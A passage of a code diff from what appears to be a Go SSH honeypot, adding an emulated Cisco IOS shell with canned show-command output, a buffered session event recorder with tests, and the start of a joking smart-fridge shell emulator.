return commandResult{output: invalidInput(cmd)}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *iosState) cmdHelp() commandResult {
|
||||||
|
cmds := commandsForMode(s.mode)
|
||||||
|
var b strings.Builder
|
||||||
|
for _, e := range cmds {
|
||||||
|
if e.name == "?" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
b.WriteString(fmt.Sprintf(" %-20s %s\n", e.name, helpText(e.name)))
|
||||||
|
}
|
||||||
|
return commandResult{output: b.String()}
|
||||||
|
}
|
||||||
|
|
||||||
|
func helpText(name string) string {
|
||||||
|
switch name {
|
||||||
|
case "show":
|
||||||
|
return "Show running system information"
|
||||||
|
case "enable":
|
||||||
|
return "Turn on privileged commands"
|
||||||
|
case "disable":
|
||||||
|
return "Turn off privileged commands"
|
||||||
|
case "exit":
|
||||||
|
return "Exit from the EXEC"
|
||||||
|
case "configure":
|
||||||
|
return "Enter configuration mode"
|
||||||
|
case "write":
|
||||||
|
return "Write running configuration to memory"
|
||||||
|
case "copy":
|
||||||
|
return "Copy from one file to another"
|
||||||
|
case "reload":
|
||||||
|
return "Halt and perform a cold restart"
|
||||||
|
case "terminal":
|
||||||
|
return "Set terminal line parameters"
|
||||||
|
case "hostname":
|
||||||
|
return "Set system's network name"
|
||||||
|
case "interface":
|
||||||
|
return "Select an interface to configure"
|
||||||
|
case "ip":
|
||||||
|
return "Global IP configuration subcommands"
|
||||||
|
case "no":
|
||||||
|
return "Negate a command or set its defaults"
|
||||||
|
case "end":
|
||||||
|
return "Exit from configure mode"
|
||||||
|
case "description":
|
||||||
|
return "Interface specific description"
|
||||||
|
case "shutdown":
|
||||||
|
return "Shutdown the selected interface"
|
||||||
|
case "switchport":
|
||||||
|
return "Set switching mode characteristics"
|
||||||
|
default:
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func invalidInput(input string) string {
|
||||||
|
return fmt.Sprintf("%% Invalid input detected at '^' marker.\n\n%s\n^", input)
|
||||||
|
}
|
||||||
234
internal/shell/cisco/output.go
Normal file
234
internal/shell/cisco/output.go
Normal file
@@ -0,0 +1,234 @@
|
|||||||
|
package cisco
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"math/rand"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
func showVersion(s *iosState) string {
|
||||||
|
days := 14 + rand.Intn(350)
|
||||||
|
hours := rand.Intn(24)
|
||||||
|
mins := rand.Intn(60)
|
||||||
|
|
||||||
|
return fmt.Sprintf(`Cisco IOS Software, %s Software (%s-UNIVERSALK9-M), Version %s, RELEASE SOFTWARE (fc3)
|
||||||
|
Technical Support: http://www.cisco.com/techsupport
|
||||||
|
Copyright (c) 1986-2019 by Cisco Systems, Inc.
|
||||||
|
Compiled Thu 30-Jan-19 10:08 by prod_rel_team
|
||||||
|
|
||||||
|
ROM: Bootstrap program is %s boot loader
|
||||||
|
BOOTLDR: %s Boot Loader (C2960-HBOOT-M) Version 15.0(2r)SE, RELEASE SOFTWARE (fc1)
|
||||||
|
|
||||||
|
%s uptime is %d days, %d hours, %d minutes
|
||||||
|
System returned to ROM by power-on
|
||||||
|
System image file is "flash:/%s-universalk9-mz.SPA.%s.bin"
|
||||||
|
|
||||||
|
This product contains cryptographic features and is subject to United States
|
||||||
|
and local country laws governing import, export, transfer and use.
|
||||||
|
|
||||||
|
cisco %s (%s) processor (revision K0) with 524288K bytes of memory.
|
||||||
|
Processor board ID %s
|
||||||
|
Last reset from power-on
|
||||||
|
2 Gigabit Ethernet interfaces
|
||||||
|
1 Virtual Ethernet interface
|
||||||
|
64K bytes of flash-simulated non-volatile configuration memory.
|
||||||
|
Total of 65536K bytes of APC System Flash (Read/Write)
|
||||||
|
|
||||||
|
Configuration register is 0x2102`,
|
||||||
|
s.model, s.model, s.iosVersion,
|
||||||
|
s.model, s.model,
|
||||||
|
s.hostname, days, hours, mins,
|
||||||
|
s.model, s.iosVersion,
|
||||||
|
s.model, processorForModel(s.model),
|
||||||
|
s.serial,
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
func processorForModel(model string) string {
|
||||||
|
if strings.HasPrefix(model, "C29") {
|
||||||
|
return "PowerPC405"
|
||||||
|
}
|
||||||
|
return "MIPS"
|
||||||
|
}
|
||||||
|
|
||||||
|
func showClock() string {
|
||||||
|
now := time.Now().UTC()
|
||||||
|
return fmt.Sprintf("*%s UTC", now.Format("15:04:05.000 Mon Jan 2 2006"))
|
||||||
|
}
|
||||||
|
|
||||||
|
func showIPRoute(s *iosState) string {
|
||||||
|
var b strings.Builder
|
||||||
|
b.WriteString("Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP\n")
|
||||||
|
b.WriteString(" D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area\n")
|
||||||
|
b.WriteString(" N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2\n")
|
||||||
|
b.WriteString(" E1 - OSPF external type 1, E2 - OSPF external type 2\n")
|
||||||
|
b.WriteString(" i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2\n")
|
||||||
|
b.WriteString(" ia - IS-IS inter area, * - candidate default, U - per-user static route\n")
|
||||||
|
b.WriteString(" o - ODR, P - periodic downloaded static route\n\n")
|
||||||
|
b.WriteString("Gateway of last resort is 10.0.0.2 to network 0.0.0.0\n\n")
|
||||||
|
|
||||||
|
for _, iface := range s.interfaces {
|
||||||
|
if iface.ip == "unassigned" || iface.status != "up" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
network := networkFromIP(iface.ip, iface.mask)
|
||||||
|
maskBits := maskBits(iface.mask)
|
||||||
|
fmt.Fprintf(&b, "C %s/%d is directly connected, %s\n", network, maskBits, iface.name)
|
||||||
|
}
|
||||||
|
b.WriteString("S* 0.0.0.0/0 [1/0] via 10.0.0.2")
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
func showIPInterfaceBrief(s *iosState) string {
|
||||||
|
var b strings.Builder
|
||||||
|
fmt.Fprintf(&b, "%-25s %-15s %-4s %-7s %-22s %s\n",
|
||||||
|
"Interface", "IP-Address", "OK?", "Method", "Status", "Protocol")
|
||||||
|
for _, iface := range s.interfaces {
|
||||||
|
ip := iface.ip
|
||||||
|
if ip == "" {
|
||||||
|
ip = "unassigned"
|
||||||
|
}
|
||||||
|
fmt.Fprintf(&b, "%-25s %-15s YES manual %-22s %s\n",
|
||||||
|
iface.name, ip, iface.status, iface.protocol)
|
||||||
|
}
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
func showInterfaces(s *iosState) string {
|
||||||
|
var b strings.Builder
|
||||||
|
for i, iface := range s.interfaces {
|
||||||
|
if i > 0 {
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
upDown := "up"
|
||||||
|
if iface.shutdown {
|
||||||
|
upDown = "administratively down"
|
||||||
|
}
|
||||||
|
fmt.Fprintf(&b, "%s is %s, line protocol is %s\n", iface.name, upDown, iface.protocol)
|
||||||
|
fmt.Fprintf(&b, " Hardware is Gigabit Ethernet, address is %s (bia %s)\n", iface.mac, iface.mac)
|
||||||
|
if iface.ip != "unassigned" && iface.ip != "" {
|
||||||
|
fmt.Fprintf(&b, " Internet address is %s/%d\n", iface.ip, maskBits(iface.mask))
|
||||||
|
}
|
||||||
|
fmt.Fprintf(&b, " MTU %d bytes, BW %s sec, DLY 10 usec,\n", iface.mtu, iface.bandwidth)
|
||||||
|
b.WriteString(" reliability 255/255, txload 1/255, rxload 1/255\n")
|
||||||
|
b.WriteString(" Encapsulation ARPA, loopback not set\n")
|
||||||
|
fmt.Fprintf(&b, " %d packets input, %d bytes, 0 no buffer\n", iface.rxPackets, iface.rxBytes)
|
||||||
|
fmt.Fprintf(&b, " %d packets output, %d bytes, 0 underruns", iface.txPackets, iface.txBytes)
|
||||||
|
}
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
func showRunningConfig(s *iosState) string {
|
||||||
|
var b strings.Builder
|
||||||
|
b.WriteString("Building configuration...\n\n")
|
||||||
|
b.WriteString("Current configuration : 1482 bytes\n")
|
||||||
|
b.WriteString("!\n")
|
||||||
|
b.WriteString("! Last configuration change at 14:32:22 UTC Mon Feb 10 2025\n")
|
||||||
|
b.WriteString("!\n")
|
||||||
|
b.WriteString("version 15.0\n")
|
||||||
|
b.WriteString("service timestamps debug datetime msec\n")
|
||||||
|
b.WriteString("service timestamps log datetime msec\n")
|
||||||
|
b.WriteString("no service password-encryption\n")
|
||||||
|
b.WriteString("!\n")
|
||||||
|
fmt.Fprintf(&b, "hostname %s\n", s.hostname)
|
||||||
|
b.WriteString("!\n")
|
||||||
|
b.WriteString("boot-start-marker\n")
|
||||||
|
b.WriteString("boot-end-marker\n")
|
||||||
|
b.WriteString("!\n")
|
||||||
|
if s.enablePass != "" {
|
||||||
|
b.WriteString("enable secret 5 $1$mERr$hx5rVt7rPNoS4wqbXKX7m0\n")
|
||||||
|
}
|
||||||
|
b.WriteString("!\n")
|
||||||
|
b.WriteString("no aaa new-model\n")
|
||||||
|
b.WriteString("!\n")
|
||||||
|
|
||||||
|
for _, iface := range s.interfaces {
|
||||||
|
b.WriteString("!\n")
|
||||||
|
fmt.Fprintf(&b, "interface %s\n", iface.name)
|
||||||
|
if iface.desc != "" {
|
||||||
|
fmt.Fprintf(&b, " description %s\n", iface.desc)
|
||||||
|
}
|
||||||
|
if iface.ip != "unassigned" && iface.ip != "" {
|
||||||
|
fmt.Fprintf(&b, " ip address %s %s\n", iface.ip, iface.mask)
|
||||||
|
} else {
|
||||||
|
b.WriteString(" no ip address\n")
|
||||||
|
}
|
||||||
|
if iface.shutdown {
|
||||||
|
b.WriteString(" shutdown\n")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
b.WriteString("!\n")
|
||||||
|
b.WriteString("ip forward-protocol nd\n")
|
||||||
|
b.WriteString("!\n")
|
||||||
|
b.WriteString("ip route 0.0.0.0 0.0.0.0 10.0.0.2\n")
|
||||||
|
b.WriteString("!\n")
|
||||||
|
b.WriteString("access-list 10 permit 192.168.1.0 0.0.0.255\n")
|
||||||
|
b.WriteString("access-list 10 deny any\n")
|
||||||
|
b.WriteString("!\n")
|
||||||
|
b.WriteString("line con 0\n")
|
||||||
|
b.WriteString(" logging synchronous\n")
|
||||||
|
b.WriteString("line vty 0 4\n")
|
||||||
|
b.WriteString(" login local\n")
|
||||||
|
b.WriteString(" transport input ssh\n")
|
||||||
|
b.WriteString("!\n")
|
||||||
|
b.WriteString("end")
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
func showVLANBrief() string {
|
||||||
|
var b strings.Builder
|
||||||
|
fmt.Fprintf(&b, "%-6s %-32s %-10s %s\n", "VLAN", "Name", "Status", "Ports")
|
||||||
|
b.WriteString("---- -------------------------------- --------- -------------------------------\n")
|
||||||
|
fmt.Fprintf(&b, "%-6s %-32s %-10s %s\n", "1", "default", "active", "Gi0/0, Gi0/1, Gi0/2")
|
||||||
|
fmt.Fprintf(&b, "%-6s %-32s %-10s %s\n", "10", "MGMT", "active", "")
|
||||||
|
fmt.Fprintf(&b, "%-6s %-32s %-10s %s\n", "20", "USERS", "active", "")
|
||||||
|
fmt.Fprintf(&b, "%-6s %-32s %-10s %s\n", "99", "NATIVE", "active", "")
|
||||||
|
fmt.Fprintf(&b, "%-6s %-32s %-10s %s\n", "1002", "fddi-default", "act/unsup", "")
|
||||||
|
fmt.Fprintf(&b, "%-6s %-32s %-10s %s\n", "1003", "token-ring-default", "act/unsup", "")
|
||||||
|
fmt.Fprintf(&b, "%-6s %-32s %-10s %s", "1004", "fddinet-default", "act/unsup", "")
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
// networkFromIP derives the network address from an IP and mask.
|
||||||
|
func networkFromIP(ip, mask string) string {
|
||||||
|
ipParts := parseIPv4(ip)
|
||||||
|
maskParts := parseIPv4(mask)
|
||||||
|
if ipParts == nil || maskParts == nil {
|
||||||
|
return ip
|
||||||
|
}
|
||||||
|
return fmt.Sprintf("%d.%d.%d.%d",
|
||||||
|
ipParts[0]&maskParts[0],
|
||||||
|
ipParts[1]&maskParts[1],
|
||||||
|
ipParts[2]&maskParts[2],
|
||||||
|
ipParts[3]&maskParts[3],
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
func maskBits(mask string) int {
|
||||||
|
parts := parseIPv4(mask)
|
||||||
|
if parts == nil {
|
||||||
|
return 24
|
||||||
|
}
|
||||||
|
bits := 0
|
||||||
|
for _, p := range parts {
|
||||||
|
for i := 7; i >= 0; i-- {
|
||||||
|
if p&(1<<uint(i)) != 0 {
|
||||||
|
bits++
|
||||||
|
} else {
|
||||||
|
return bits
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return bits
|
||||||
|
}
|
||||||
|
|
||||||
|
func parseIPv4(s string) []int {
|
||||||
|
var a, b, c, d int
|
||||||
|
n, _ := fmt.Sscanf(s, "%d.%d.%d.%d", &a, &b, &c, &d)
|
||||||
|
if n != 4 {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
return []int{a, b, c, d}
|
||||||
|
}
|
||||||
109
internal/shell/cisco/state.go
Normal file
109
internal/shell/cisco/state.go
Normal file
@@ -0,0 +1,109 @@
|
|||||||
|
package cisco
|
||||||
|
|
||||||
|
import "fmt"
|
||||||
|
|
||||||
|
// iosMode represents the current CLI mode of the IOS state machine.
|
||||||
|
type iosMode int
|
||||||
|
|
||||||
|
const (
|
||||||
|
modeUserExec iosMode = iota // Router>
|
||||||
|
modePrivilegedExec // Router#
|
||||||
|
modeGlobalConfig // Router(config)#
|
||||||
|
modeInterfaceConfig // Router(config-if)#
|
||||||
|
)
|
||||||
|
|
||||||
|
// ifaceInfo holds interface metadata for show commands.
|
||||||
|
type ifaceInfo struct {
|
||||||
|
name string
|
||||||
|
ip string
|
||||||
|
mask string
|
||||||
|
status string
|
||||||
|
protocol string
|
||||||
|
mac string
|
||||||
|
bandwidth string
|
||||||
|
mtu int
|
||||||
|
rxPackets int
|
||||||
|
txPackets int
|
||||||
|
rxBytes int
|
||||||
|
txBytes int
|
||||||
|
shutdown bool
|
||||||
|
desc string
|
||||||
|
}
|
||||||
|
|
||||||
|
// iosState holds all mutable state for the Cisco IOS shell session.
|
||||||
|
type iosState struct {
|
||||||
|
mode iosMode
|
||||||
|
hostname string
|
||||||
|
model string
|
||||||
|
iosVersion string
|
||||||
|
serial string
|
||||||
|
enablePass string
|
||||||
|
interfaces []ifaceInfo
|
||||||
|
currentIf string
|
||||||
|
}
|
||||||
|
|
||||||
|
func newIOSState(hostname, model, iosVersion, enablePass string) *iosState {
|
||||||
|
return &iosState{
|
||||||
|
mode: modeUserExec,
|
||||||
|
hostname: hostname,
|
||||||
|
model: model,
|
||||||
|
iosVersion: iosVersion,
|
||||||
|
serial: "FTX1524Z0P3",
|
||||||
|
enablePass: enablePass,
|
||||||
|
interfaces: defaultInterfaces(),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func defaultInterfaces() []ifaceInfo {
|
||||||
|
return []ifaceInfo{
|
||||||
|
{
|
||||||
|
name: "GigabitEthernet0/0", ip: "192.168.1.1", mask: "255.255.255.0",
|
||||||
|
status: "up", protocol: "up", mac: "0050.7966.6800",
|
||||||
|
bandwidth: "1000000 Kbit", mtu: 1500,
|
||||||
|
rxPackets: 148253, txPackets: 93127, rxBytes: 19284732, txBytes: 8291043,
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "GigabitEthernet0/1", ip: "10.0.0.1", mask: "255.255.255.252",
|
||||||
|
status: "up", protocol: "up", mac: "0050.7966.6801",
|
||||||
|
bandwidth: "1000000 Kbit", mtu: 1500,
|
||||||
|
rxPackets: 52104, txPackets: 48891, rxBytes: 4182934, txBytes: 3901284,
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "GigabitEthernet0/2", ip: "unassigned", mask: "",
|
||||||
|
status: "administratively down", protocol: "down", mac: "0050.7966.6802",
|
||||||
|
bandwidth: "1000000 Kbit", mtu: 1500, shutdown: true,
|
||||||
|
},
|
||||||
|
{
|
||||||
|
name: "Vlan1", ip: "172.16.0.1", mask: "255.255.0.0",
|
||||||
|
status: "up", protocol: "up", mac: "0050.7966.6810",
|
||||||
|
bandwidth: "1000000 Kbit", mtu: 1500,
|
||||||
|
rxPackets: 8421, txPackets: 7103, rxBytes: 512384, txBytes: 423901,
|
||||||
|
},
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// prompt returns the IOS prompt string for the current mode.
|
||||||
|
func (s *iosState) prompt() string {
|
||||||
|
switch s.mode {
|
||||||
|
case modeUserExec:
|
||||||
|
return fmt.Sprintf("%s>", s.hostname)
|
||||||
|
case modePrivilegedExec:
|
||||||
|
return fmt.Sprintf("%s#", s.hostname)
|
||||||
|
case modeGlobalConfig:
|
||||||
|
return fmt.Sprintf("%s(config)#", s.hostname)
|
||||||
|
case modeInterfaceConfig:
|
||||||
|
return fmt.Sprintf("%s(config-if)#", s.hostname)
|
||||||
|
default:
|
||||||
|
return fmt.Sprintf("%s>", s.hostname)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// findInterface returns a pointer to the interface with the given name, or nil.
|
||||||
|
func (s *iosState) findInterface(name string) *ifaceInfo {
|
||||||
|
for i := range s.interfaces {
|
||||||
|
if s.interfaces[i].name == name {
|
||||||
|
return &s.interfaces[i]
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
92
internal/shell/eventrecorder.go
Normal file
92
internal/shell/eventrecorder.go
Normal file
@@ -0,0 +1,92 @@
|
|||||||
|
package shell
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"log/slog"
|
||||||
|
"sync"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/storage"
|
||||||
|
)
|
||||||
|
|
||||||
|
// EventRecorder buffers I/O events in memory and periodically flushes them to
|
||||||
|
// a storage.Store. It is designed to be registered as a RecordingChannel
|
||||||
|
// callback so that SSH I/O is never blocked by database writes.
|
||||||
|
type EventRecorder struct {
|
||||||
|
sessionID string
|
||||||
|
store storage.Store
|
||||||
|
logger *slog.Logger
|
||||||
|
|
||||||
|
mu sync.Mutex
|
||||||
|
buf []storage.SessionEvent
|
||||||
|
cancel context.CancelFunc
|
||||||
|
done chan struct{}
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewEventRecorder creates a recorder that will persist events for the given session.
|
||||||
|
func NewEventRecorder(sessionID string, store storage.Store, logger *slog.Logger) *EventRecorder {
|
||||||
|
return &EventRecorder{
|
||||||
|
sessionID: sessionID,
|
||||||
|
store: store,
|
||||||
|
logger: logger,
|
||||||
|
done: make(chan struct{}),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// RecordEvent implements the EventCallback signature and appends an event to
|
||||||
|
// the in-memory buffer. It is safe to call concurrently.
|
||||||
|
func (er *EventRecorder) RecordEvent(ts time.Time, direction int, data []byte) {
|
||||||
|
er.mu.Lock()
|
||||||
|
defer er.mu.Unlock()
|
||||||
|
er.buf = append(er.buf, storage.SessionEvent{
|
||||||
|
SessionID: er.sessionID,
|
||||||
|
Timestamp: ts,
|
||||||
|
Direction: direction,
|
||||||
|
Data: data,
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// Start begins the background flush goroutine that drains the buffer every 2 seconds.
|
||||||
|
func (er *EventRecorder) Start(ctx context.Context) {
|
||||||
|
ctx, er.cancel = context.WithCancel(ctx)
|
||||||
|
go er.run(ctx)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Close cancels the background goroutine and performs a final flush.
|
||||||
|
func (er *EventRecorder) Close() {
|
||||||
|
if er.cancel != nil {
|
||||||
|
er.cancel()
|
||||||
|
}
|
||||||
|
<-er.done
|
||||||
|
}
|
||||||
|
|
||||||
|
func (er *EventRecorder) run(ctx context.Context) {
|
||||||
|
defer close(er.done)
|
||||||
|
ticker := time.NewTicker(2 * time.Second)
|
||||||
|
defer ticker.Stop()
|
||||||
|
|
||||||
|
for {
|
||||||
|
select {
|
||||||
|
case <-ctx.Done():
|
||||||
|
er.flush()
|
||||||
|
return
|
||||||
|
case <-ticker.C:
|
||||||
|
er.flush()
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (er *EventRecorder) flush() {
|
||||||
|
er.mu.Lock()
|
||||||
|
if len(er.buf) == 0 {
|
||||||
|
er.mu.Unlock()
|
||||||
|
return
|
||||||
|
}
|
||||||
|
events := er.buf
|
||||||
|
er.buf = nil
|
||||||
|
er.mu.Unlock()
|
||||||
|
|
||||||
|
if err := er.store.AppendSessionEvents(context.Background(), events); err != nil {
|
||||||
|
er.logger.Error("failed to flush session events", "err", err, "session_id", er.sessionID)
|
||||||
|
}
|
||||||
|
}
|
||||||
80
internal/shell/eventrecorder_test.go
Normal file
80
internal/shell/eventrecorder_test.go
Normal file
@@ -0,0 +1,80 @@
|
|||||||
|
package shell
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"log/slog"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/storage"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestEventRecorderFlush(t *testing.T) {
|
||||||
|
store := storage.NewMemoryStore()
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
// Create a session so events have a valid session ID.
|
||||||
|
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
rec := NewEventRecorder(id, store, slog.Default())
|
||||||
|
rec.Start(ctx)
|
||||||
|
|
||||||
|
// Record some events.
|
||||||
|
now := time.Now()
|
||||||
|
rec.RecordEvent(now, 0, []byte("hello"))
|
||||||
|
rec.RecordEvent(now.Add(100*time.Millisecond), 1, []byte("world"))
|
||||||
|
|
||||||
|
// Close should trigger final flush.
|
||||||
|
rec.Close()
|
||||||
|
|
||||||
|
events, err := store.GetSessionEvents(ctx, id)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetSessionEvents: %v", err)
|
||||||
|
}
|
||||||
|
if len(events) != 2 {
|
||||||
|
t.Fatalf("len = %d, want 2", len(events))
|
||||||
|
}
|
||||||
|
if string(events[0].Data) != "hello" {
|
||||||
|
t.Errorf("events[0].Data = %q, want %q", events[0].Data, "hello")
|
||||||
|
}
|
||||||
|
if events[0].Direction != 0 {
|
||||||
|
t.Errorf("events[0].Direction = %d, want 0", events[0].Direction)
|
||||||
|
}
|
||||||
|
if string(events[1].Data) != "world" {
|
||||||
|
t.Errorf("events[1].Data = %q, want %q", events[1].Data, "world")
|
||||||
|
}
|
||||||
|
if events[1].Direction != 1 {
|
||||||
|
t.Errorf("events[1].Direction = %d, want 1", events[1].Direction)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestEventRecorderPeriodicFlush(t *testing.T) {
|
||||||
|
store := storage.NewMemoryStore()
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
rec := NewEventRecorder(id, store, slog.Default())
|
||||||
|
rec.Start(ctx)
|
||||||
|
|
||||||
|
// Record an event and wait for the periodic flush (2s + some margin).
|
||||||
|
rec.RecordEvent(time.Now(), 1, []byte("periodic"))
|
||||||
|
|
||||||
|
time.Sleep(3 * time.Second)
|
||||||
|
|
||||||
|
events, err := store.GetSessionEvents(ctx, id)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetSessionEvents: %v", err)
|
||||||
|
}
|
||||||
|
if len(events) != 1 {
|
||||||
|
t.Errorf("expected periodic flush, got %d events", len(events))
|
||||||
|
}
|
||||||
|
|
||||||
|
rec.Close()
|
||||||
|
}
|
||||||
352
internal/shell/fridge/fridge.go
Normal file
352
internal/shell/fridge/fridge.go
Normal file
@@ -0,0 +1,352 @@
|
|||||||
|
package fridge
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
)
|
||||||
|
|
||||||
|
const sessionTimeout = 5 * time.Minute
|
||||||
|
|
||||||
|
// FridgeShell emulates a Samsung Smart Fridge OS interface.
|
||||||
|
type FridgeShell struct{}
|
||||||
|
|
||||||
|
// NewFridgeShell returns a new FridgeShell instance.
|
||||||
|
func NewFridgeShell() *FridgeShell {
|
||||||
|
return &FridgeShell{}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (f *FridgeShell) Name() string { return "fridge" }
|
||||||
|
func (f *FridgeShell) Description() string { return "Samsung Smart Fridge shell emulator" }
|
||||||
|
|
||||||
|
func (f *FridgeShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
|
||||||
|
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
state := newFridgeState()
|
||||||
|
|
||||||
|
// Boot banner — convert \n to \r\n for terminal display.
|
||||||
|
banner := strings.ReplaceAll(bootBanner(), "\n", "\r\n")
|
||||||
|
fmt.Fprint(rw, banner)
|
||||||
|
|
||||||
|
for {
|
||||||
|
if _, err := fmt.Fprint(rw, "FridgeOS> "); err != nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
line, err := shell.ReadLine(ctx, rw)
|
||||||
|
if errors.Is(err, io.EOF) {
|
||||||
|
fmt.Fprint(rw, "logout\r\n")
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
if err != nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
trimmed := strings.TrimSpace(line)
|
||||||
|
if trimmed == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
result := state.dispatch(trimmed)
|
||||||
|
|
||||||
|
var output string
|
||||||
|
if result.output != "" {
|
||||||
|
output = result.output
|
||||||
|
output = strings.ReplaceAll(output, "\r\n", "\n")
|
||||||
|
output = strings.ReplaceAll(output, "\n", "\r\n")
|
||||||
|
fmt.Fprintf(rw, "%s\r\n", output)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Log command and output to store.
|
||||||
|
if sess.Store != nil {
|
||||||
|
if err := sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, output); err != nil {
|
||||||
|
return fmt.Errorf("append session log: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if sess.OnCommand != nil {
|
||||||
|
sess.OnCommand("fridge")
|
||||||
|
}
|
||||||
|
|
||||||
|
if result.exit {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func bootBanner() string {
|
||||||
|
now := time.Now()
|
||||||
|
defrost := now.Add(-3*time.Hour - 22*time.Minute).Format("2006-01-02 15:04")
|
||||||
|
return fmt.Sprintf(`
|
||||||
|
_____ ____ ___ ____ ____ _____ ___ ____
|
||||||
|
| ___| _ \|_ _| _ \ / ___| ____/ _ \/ ___|
|
||||||
|
| |_ | |_) || || | | | | _| _|| | | \___ \
|
||||||
|
| _| | _ < | || |_| | |_| | |__| |_| |___) |
|
||||||
|
|_| |_| \_\___|____/ \____|_____\___/|____/
|
||||||
|
|
||||||
|
Samsung Smart Fridge OS v3.2.1 (FridgeOS-ARM)
|
||||||
|
Model: RF28R7351SR | Serial: SN-2847-FRDG-9182
|
||||||
|
Firmware: 3.2.1-stable | Last defrost: %s
|
||||||
|
|
||||||
|
Type 'help' for available commands.
|
||||||
|
|
||||||
|
`, defrost)
|
||||||
|
}
|
||||||
|
|
||||||
|
type fridgeState struct {
|
||||||
|
inventory []inventoryItem
|
||||||
|
fridgeF int // fridge temp in °F
|
||||||
|
freezerF int // freezer temp in °F
|
||||||
|
}
|
||||||
|
|
||||||
|
type inventoryItem struct {
|
||||||
|
name string
|
||||||
|
expiry string
|
||||||
|
}
|
||||||
|
|
||||||
|
type commandResult struct {
|
||||||
|
output string
|
||||||
|
exit bool
|
||||||
|
}
|
||||||
|
|
||||||
|
func newFridgeState() *fridgeState {
|
||||||
|
return &fridgeState{
|
||||||
|
inventory: []inventoryItem{
|
||||||
|
{"Whole Milk (1 gal)", time.Now().Add(48 * time.Hour).Format("2006-01-02")},
|
||||||
|
{"Eggs (dozen)", time.Now().Add(7 * 24 * time.Hour).Format("2006-01-02")},
|
||||||
|
{"Leftover Pizza (3 slices)", time.Now().Add(24 * time.Hour).Format("2006-01-02")},
|
||||||
|
{"Orange Juice", time.Now().Add(5 * 24 * time.Hour).Format("2006-01-02")},
|
||||||
|
{"Butter (unsalted)", time.Now().Add(30 * 24 * time.Hour).Format("2006-01-02")},
|
||||||
|
{"Mystery Tupperware", time.Now().Add(-14 * 24 * time.Hour).Format("2006-01-02")},
|
||||||
|
},
|
||||||
|
fridgeF: 37,
|
||||||
|
freezerF: 0,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *fridgeState) dispatch(input string) commandResult {
|
||||||
|
